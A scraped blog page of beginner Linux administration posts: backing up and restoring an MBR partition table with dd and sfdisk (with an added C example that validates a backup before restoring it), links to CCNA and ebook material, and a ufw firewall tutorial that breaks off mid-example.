<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio8tbcemYqv2XTVSpb4ldp4HeAXA4DjbJWuGq8o91M8PQ60YE71vhlyD12jpEWiIQpUTWx2z_yg1-f-o6_T4X-az7QeYAp0oD4fnEukndeD2nIQMUiBYcFqEyJ50Ds5zxg8ZBYCBSDeHyY/s1600/guid-partition-table-schemesvg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio8tbcemYqv2XTVSpb4ldp4HeAXA4DjbJWuGq8o91M8PQ60YE71vhlyD12jpEWiIQpUTWx2z_yg1-f-o6_T4X-az7QeYAp0oD4fnEukndeD2nIQMUiBYcFqEyJ50Ds5zxg8ZBYCBSDeHyY/s1600/guid-partition-table-schemesvg.png" height="320" width="232" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>1:)</b>The good old dd command can back up the partition table. Backing up the partition table this way amounts to backing up the MBR (master boot record). The following command backs up the MBR stored on /dev/sdX or /dev/hdX, depending on whether you are using SCSI or IDE:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"># <b>dd if=/dev/sdX of=/tmp/sda-mbr.bin bs=512 count=1</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Replace X with actual device name such as /dev/sda.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">To restore the partition table to the disk, use dd again, this time copying only the 64 bytes of the partition table:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">#<b> dd if=/tmp/sda-mbr.bin of=/dev/sdX bs=1 count=64 skip=446 seek=446</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; color: #111111; line-height: 21.983333587646484px;">The 512-byte MBR consists of 446 bytes of bootstrap code, then 4 partition entries x 16 bytes = 64 bytes, then 2 bytes of signature (a 16 bit number = 0101010110101010). With skip=446, seek=446 and count=64, the restore therefore rewrites only the partition entries and leaves the bootstrap code and the signature on the disk untouched.<br /><br /><br /><b>2:)</b></span><span style="color: #111111;"><span style="line-height: 21.983333587646484px;">We can get a quick look at all the existing partitions on all the available hard drives with fdisk, using the -l switch without any other parameter:</span></span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">mango@pineapple:~$<b> sudo fdisk -l</b></span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">[sudo] password for mango: </span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">Disk /dev/sda: 16.1 GB, 16106127360 bytes</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">255 heads, 63 sectors/track, 1958 cylinders</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">Units = cylinders of 16065 * 512 = 8225280 bytes</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">Disk identifier: 0x0000a1e3</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"> Device Boot Start End Blocks Id System</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda1 * 1 1870 15020743+ 83 Linux</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda2 1871 1958 706860 5 Extended</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda5 1871 1958 706828+ 82 Linux swap / Solaris</span></span><br />
<div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">mango@pineapple:~$ <b>sudo sfdisk -d /dev/sda</b></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"># partition table of /dev/sda</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">unit: sectors</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda1 : start= 63, size= 30041487, Id=83, bootable</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda2 : start= 30041550, size= 1413720, Id= 5</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda3 : start= 0, size= 0, Id= 0</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda4 : start= 0, size= 0, Id= 0</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda5 : start= 30041613, size= 1413657, Id=82</span></span></div>
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Using sfdisk with the -d option we can get a dump of the current partition table in a regular file, and if needed we can restore it from that file:</span></div>
<div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><b>sfdisk -d /dev/sda > sdaTable</b></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">and to restore the partition table:</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><b>sfdisk /dev/sda &lt; sdaTable</b></span></span></div>
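What the dd backup from method 1 contains, and a sanity check worth running on it before restoring, shown in C as an added example (not code from the original post). The sample sector is constructed in memory from the sfdisk dump above (sda1 and sda2; sda5 is a logical partition and does not live in the MBR); the function names, the placeholder bootstrap bytes and the zeroed CHS fields are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECTOR 512
#define PT_OFF 446      /* bytes 0..445 are bootstrap code */
#define PT_LEN 64       /* 4 entries x 16 bytes; signature follows at 510..511 */

struct part { uint8_t boot, type; uint32_t start, size; };

static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void put_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Parse the four primary entries. Returns how many are in use, or -1 if the
 * sector fails a sanity check and should not be trusted as a backup. */
static int mbr_parse(const uint8_t *s, struct part out[4]) {
    int used = 0;
    if (s[510] != 0x55 || s[511] != 0xAA) return -1;       /* signature bytes */
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = s + PT_OFF + 16 * i;
        if (e[0] != 0x00 && e[0] != 0x80) return -1;        /* boot flag */
        out[i].boot = e[0];
        out[i].type = e[4];
        out[i].start = get_le32(e + 8);                     /* first sector (LBA) */
        out[i].size = get_le32(e + 12);                     /* length in sectors */
        if (out[i].type == 0) continue;                     /* unused slot */
        if (out[i].size == 0) return -1;
        for (int j = 0; j < i; j++) {                       /* entries must not overlap */
            uint64_t a0 = out[j].start, a1 = a0 + out[j].size;
            uint64_t b0 = out[i].start, b1 = b0 + out[i].size;
            if (out[j].type != 0 && a0 < b1 && b0 < a1) return -1;
        }
        used++;
    }
    return used;
}

/* Same effect as dd bs=1 count=64 skip=446 seek=446, but only after the
 * backup passes mbr_parse(). Bootstrap code and signature stay as they are. */
static int restore_table(uint8_t *disk0, const uint8_t *backup) {
    struct part tmp[4];
    if (mbr_parse(backup, tmp) < 0) return -1;
    memcpy(disk0 + PT_OFF, backup + PT_OFF, PT_LEN);
    return 0;
}

static void set_entry(uint8_t *s, int i, uint8_t boot, uint8_t type,
                      uint32_t start, uint32_t size) {
    uint8_t *e = s + PT_OFF + 16 * i;
    memset(e, 0, 16);                                       /* CHS fields left zero */
    e[0] = boot;
    e[4] = type;
    put_le32(e + 8, start);
    put_le32(e + 12, size);
}

/* Constructed sample sector using the start/size/Id values from the sfdisk dump. */
static void make_sample(uint8_t *s) {
    memset(s, 0, SECTOR);
    memset(s, 0x90, PT_OFF);                                /* placeholder bootstrap bytes */
    set_entry(s, 0, 0x80, 0x83, 63, 30041487);              /* sda1, bootable, Linux */
    set_entry(s, 1, 0x00, 0x05, 30041550, 1413720);         /* sda2, Extended */
    s[510] = 0x55;
    s[511] = 0xAA;
}

int main(void) {
    uint8_t backup[SECTOR];
    struct part p[4];
    make_sample(backup);
    int used = mbr_parse(backup, p);
    printf("entries in use: %d\n", used);
    for (int i = 0; i < 4 && used >= 0; i++)
        printf("entry %d: boot=%#x type=%#x start=%u size=%u\n", i + 1,
               (unsigned)p[i].boot, (unsigned)p[i].type,
               (unsigned)p[i].start, (unsigned)p[i].size);
    return 0;
}
```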
</div>
</div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-89401404217884474662012-12-29T08:57:00.001-08:002012-12-29T08:57:58.764-08:00CCNA Cisco Certification<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNh7e0v_6TbLS4y0_0AXkCLHUGFFKXmj07LRnnQUc_qasVnHp8BaCxuzYsd79NwTUmW6F7N4Jcn13cGiZ_ZWtenXunbvVQwDPu7bo1XI_j2nvjZQUWG_y06tg1rEFC-YAjsvZVM6pTfkGS/s1600/cisco-lab-routers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNh7e0v_6TbLS4y0_0AXkCLHUGFFKXmj07LRnnQUc_qasVnHp8BaCxuzYsd79NwTUmW6F7N4Jcn13cGiZ_ZWtenXunbvVQwDPu7bo1XI_j2nvjZQUWG_y06tg1rEFC-YAjsvZVM6pTfkGS/s1600/cisco-lab-routers.jpg" height="253" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
Go to the following link for information about CCNA Cisco certification:</div>
<div style="text-align: center;">
http://ccna-rohit.blogspot.in </div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com12tag:blogger.com,1999:blog-6934113520237822184.post-18645692583705104002012-12-29T08:07:00.002-08:002012-12-29T08:07:40.512-08:00Linux Administration Ebook For Beginners <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.4shared.com/office/lpElKzfP/Linux_Administration_Handbook.html" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQXK2P11SEHN5uDbGmCKXE5dD__8J2EbupNM-A_JQJHqOtJ0uN8S5mMNW_yJMAVbHGOg9Pm3cvaFx6h1RRvrBP1hwzXCp72YviOpm1w__LrRoGlfA4MBqrLv2Jo6i84dL2k4AZxLthXNK/s1600/tux2520linux2520distros.jpg" height="320" width="320" /></a></div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-7175320523140865122012-12-28T14:43:00.002-08:002012-12-28T14:44:18.743-08:00ufw - Uncomplicated Firewall<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;">The Linux kernel includes the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Netfilter</span> subsystem, which is used to manipulate or decide the fate of network traffic headed into or through your server. All modern Linux firewall solutions use this system for packet filtering.</span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;">The kernel's packet filtering system would be of little use to administrators without a userspace interface to manage it. This is the purpose of iptables. When a packet reaches your server, it will be handed off to the Netfilter subsystem for acceptance, manipulation, or rejection based on the rules supplied to it from userspace via iptables. Thus, iptables is all you need to manage your firewall if you're familiar with it, but many frontends are available to simplify the task.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1CLDvFDGklWS13IQ8yzJ5b7oqYMKSv1hPwNtB6fQ2Ag0bHMGg87bQRljMyvR4j8JPqGxBVpyeMvvAzGaAFMR6v5rb_2UEgzf1pNogJoD8cjMl0aS6b8-GPQCXr26ZHGS59GRZaMqnc4eX/s1600/firewall-psd_35-53626.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1CLDvFDGklWS13IQ8yzJ5b7oqYMKSv1hPwNtB6fQ2Ag0bHMGg87bQRljMyvR4j8JPqGxBVpyeMvvAzGaAFMR6v5rb_2UEgzf1pNogJoD8cjMl0aS6b8-GPQCXr26ZHGS59GRZaMqnc4eX/s1600/firewall-psd_35-53626.jpg" height="318" width="400" /></span></a></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>ufw - Uncomplicated Firewall</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">The default firewall configuration tool for Ubuntu is ufw. Developed to ease iptables firewall configuration, ufw provides a user-friendly way to create an IPv4 or IPv6 host-based firewall.</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">ufw is disabled by default. From the ufw man page:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">“ufw is not intended to provide complete firewall functionality via its command interface, but instead provides an easy way to add or remove simple rules. It is currently mainly used for host-based firewalls.”</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">The following are some examples of how to use ufw:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">First, ufw needs to be enabled. From a terminal prompt enter:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw enable</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To open a port (ssh in this example):</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw allow 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Rules can also be added using a numbered format:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw insert 1 allow 80</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Similarly, to close an opened port:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw deny 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">To remove a rule, use delete followed by the rule:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw delete deny 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">It is also possible to allow access from specific hosts or networks to a port. The following example allows ssh access from host 192.168.0.2 to any IP address on this host:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw allow proto tcp from 192.168.0.2 to any port 22</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Replace 192.168.0.2 with 192.168.0.0/24 to allow ssh access from the entire subnet.</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">Adding the --dry-run option to a ufw command will output the resulting rules, but not apply them. For example, the following is what would be applied if opening the HTTP port:</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><br /></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;"><b>sudo ufw --dry-run allow http</b></span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">*filter</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-input - [0:0]</span></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19px;">:ufw-user-output - [0:0]</span></span></div>
